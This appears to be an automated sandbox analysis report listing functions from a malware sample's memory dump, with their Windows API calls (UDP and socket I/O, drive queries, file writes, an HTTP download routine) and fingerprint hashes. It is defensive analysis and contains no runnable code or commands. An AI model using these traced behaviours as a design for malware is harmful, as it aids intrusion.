                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                    • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                    • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                    • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                    • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                    Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                    • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                    • String ID: ?c@$\??\
                                                                                                                                    • API String ID: 1681518211-744975932
                                                                                                                                    • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                    • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3966618661-0
                                                                                                                                    • Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                    • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                    • Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                    • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                    Function 0040B530 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                    • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 442028454-0
                                                                                                                                    • Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                    • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                    • Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                    • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                    Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                    • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                    • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                    Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                      • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                    • Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                    • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                    • Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                    • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                    • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                    • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                    • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                    • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                    Function 0040DE90 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040DED8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3102160386-0
                                                                                                                                    • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                    • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                    • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                    • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                    • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                    • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                    • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                    • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                    Function 00407390 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                    • SysAllocString.OLEAUT32(004161D0), ref: 004073A3
                                                                                                                                    • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                      • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 459949847-0
                                                                                                                                    • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                    • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                    • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                    • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                    Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                    • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                    • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                    • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                    • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                    Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                      • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                      • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                      • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                      • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                      • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                      • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                      • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                      • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                      • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                      • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                    Strings
